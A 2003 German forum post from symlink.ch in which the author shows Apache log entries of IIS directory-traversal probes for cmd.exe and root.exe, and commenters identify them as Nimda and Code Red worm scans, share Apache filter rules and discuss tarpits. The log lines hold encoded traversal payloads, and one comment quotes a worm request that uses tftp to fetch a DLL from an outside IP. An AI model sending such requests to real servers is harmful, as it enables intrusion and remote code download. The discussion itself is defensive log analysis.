symlink.ch | Neulich im Logbuch

symlink.ch

FAQ
Mission
Über uns
Richtlinien

Moderation
Einstellungen
Story einsenden

Suchen & Index
Ruhmeshalle
Statistiken
Umfragen

Redaktion
Themen
Partner
Planet

XML | RDF | RSS
PDA | WAP | IRC
Symbar für Opera
Symbar für Mozilla

Freunde

Benutzergruppen
LUG Switzerland
LUG Vorarlberg
LUGen in DE
SIUG
CCCZH
Organisationen
Wilhelm Tux
FSF Europe
Events
LinuxDay Dornbirn
BBA Schweiz
CoSin in Bremgarten AG
VCFe in München
Menschen
maol
Flupp
Ventilator
dawn
gumbo
krümelmonster
XTaran
maradong
tuxedo

Neulich im Logbuch

Veröffentlicht durch Raffzahn am Samstag 15. Februar, 11:16
Aus der hacktick-fuer-anfaenger Abteilung

Gerade hab ich wieder mal im Apache Log rumgestöbert, und dabei einen Nachhilfekurs für Windowshacker entdeckt...

62.234.168.*** [14/Feb/2003:11:42:34 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:35 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:35 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:36 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:37 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:37 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:38 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:38 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:39 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:39 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:40 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:41 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:41 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:42 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:43 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
62.234.168.*** [14/Feb/2003:11:42:44 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

Nett was? Es ist schon bezeichnend wenn solche Tricks immer noch erfolgversprechend sind...

Der per ReverseDNS ausgespuckte Name (**hn-c-88fb.adsl.wanadoo.nl) deutet auf einen holländischen Hobbyhacker mit ADSL Anschluß (deswegen auch die Sternchen. Ich möchte nicht schuld sein wenn der nächste Kunde der sich einloggt deswegen Schwierigkeiten hat). Die immer größere Verbreitung von DSL und Flatrate sorgt für eine richtige AOLifizierung der Superhacker. Leider war der Kleine, als ich nachgeschaut habe, schon wieder offline. Schade.

Weitere lustige Erkentnis: immer noch 1-3 Code Red Aufrufe pro Tag... Wo doch sogar MS schon seit EINEINHALB Jahren dafür einen Patch hat.

< ACCU Entwicklerkonferenz in London | Druckausgabe | Singende Vulkane >

symlink.ch Login

extrahierte Links

Slashdot

holländisch

ADSL

Patch

Mehr zu Datenschutz

Auch von Raffzahn

Diese Diskussion wurde archiviert. Es können keine neuen Kommentare abgegeben werden.

Hack from NL (Score:0)

Von Anonymer Feigling am Saturday 15. February, 11:25 MEW (#1)

it's really nice.
for me: chineese...
:-)

alles alter kaffee. wahre A0L'er sind schlauer (Score:0)

Von Anonymer Feigling am Saturday 15. February, 11:31 MEW (#2)

alles ein riesen schmarn! unter uns: es gibt die möglichkeit sich mit der ms-dos eingabeauffoderung per anonymous ftp einloggen und die passwort datei passwd (unter /etc/paasswd) zu downloaden. nur noch schnell cracken und schon hat man die passwörter.es gibt da noch was mit shadow?! aber was DAS ist weiss ich nicht. keine logs im indianer sind garantiert. aber psst! ;)

Nimda (Score:2, Informativ)

Von khriss am Saturday 15. February, 11:34 MEW (#3)
(User #1035 Info)

Na ja, ob der Holländer da wirklich wissentlich probiert hat einzubrechen, wage ich zu bezweifeln. In meinen Augen sieht es aus wie ein "gewöhnlicher" Nimda-Scan. Siehe auch http://aris .se curityfocus.com/alerts/nimda/010919-Analysis-Nimda.pdf.

Nicht zwingen ``Hacker'' (Score:1)

Von Maverick (lb-web@projectdream.org) am Saturday 15. February, 11:35 MEW (#4)
(User #757 Info) http://projectdream.org

Das muss nicht unbedingt ein Scriptkiddie gewesen sein. Es kann auch ein Vollidiot gewesen sein, der immer noch Code Red / Nimda auf seiner Kiste hat :)

Nervkram (Score:2, Informativ)

Von cyrun am Saturday 15. February, 12:26 MEW (#5)
(User #247 Info)

Hallo,

folgende Beispiel-Zeilen verschaffen Ruhe im Log:

SetEnvIf Request_URI "/winnt/system32/cmd\.exe" nimda
SetEnvIf Request_URI "/scripts/root\.exe" nimda
SetEnvIf Request_URI "/MSADC/root\.exe" nimda
SetEnvIf Request_URI "/\.\." nimda
SetEnvIf Request_URI "\.\./" nimda

CustomLog /var/log/httpd/access_log common env=!nimda

(Den eigenen Gepflogenheiten anzupassen, alternativ z.B. eine Umleitung nach /dev/null wenn env=nimda)

Auch interessant:

http://salfter.dyndns.org/codered.shtml

Viele nette kleine Beispiele, wie man den Leuten mitteilen kann, dass sie ein Sicherheitsproblem haben...

Re:Nervkram (Score:1)

Von stinger (stinger@alfeld.de) am Saturday 15. February, 21:09 MEW (#6)
(User #256 Info) http://www.plenet.de/

Ich hab mal ne Teergrube installiert, indem ich die entsprechenden Anfragen auf ein Perl-Script umgeleitet habe das mit sleep() einfach nix gemacht hat ausser am Ende der eingestellten Zeit nen Log zur Erfolgskontrolle schreiben. Hat gut funktioniert - meist liessen sich die Anfragen 3-4 Minuten hinhalten.

Das sollte man aber nur machen, wenn man sich die Anzahl der Prozesse auf dem Server leisten kann und die nicht begrenzt sind :-)

Weiteres Problem (Score:1)

Von Raffzahn am Monday 17. February, 15:56 MEW (#10)
(User #345 Info) http://www.vcfe.org/

Die Logmeldungen sind garnicht so sehr das aegerniss, Filter sind mir ja auch nicht ganz unbekannt. Was schlimmer ist ist das jede Anfrage eine auch Trafic macht - und den muss ich Zahlen. Beim Code Red reichts ja eine leere default.ida in s rootdirectory zu packen und die response ist so klein wie moeglich. Hier muesste schon viel mehr gebastelt werden...

Gruss
H.

Ach ja, das mit dem haengenlassen ist auch lustig :)

mehr (Score:1)

Von apple am Sunday 16. February, 00:02 MEW (#7)
(User #817 Info)

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.56.191.98%20GET %20cool.dll%20e:\httpodbc.dll
/_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll

und so weiter... aber die kommen wahrscheinlich nur, wenn der Wurm ein 200 OK abbekommen hat.

Ich habe versucht, eine Teergrube in einen HTTP-Server zu integrieren, aber die meisten "clients" brechen sehr schnell ab. Wie tut man sowas nun richtig? Anleitungen? Tips? URLs?

Bernhard M.

Nerviges Problem (Score:2)

Von NoSuchGuy am Sunday 16. February, 01:12 MEW (#8)
(User #97 Info)

Bi mir tauchen auch 3-10 am Tag im Logfile auf. Dabei habe ich nur einen Virtuellen Host eingerichtet der nur auf der IP-Adresse lauscht. Die anderen V-Hosts haben diese Scans/Probes nicht im Logfile

NSG
--
"In keinem Bereich menschlicher Leistungen sind so schlechte Ergebnisse erzielt worden wie in der Politik!"

Re:Nerviges Problem (Score:0)

Von Anonymer Feigling am Monday 17. February, 15:51 MEW (#9)

3-10 mal am Tag geht noch. Bei mir sehe ich am Nachmittag ca alle 5 Minuten einen solchen Eintrag. Und alles innerhalb des Cablecom Netzes.

Durchsuche symlink.ch:

Never be led astray onto the path of virtue.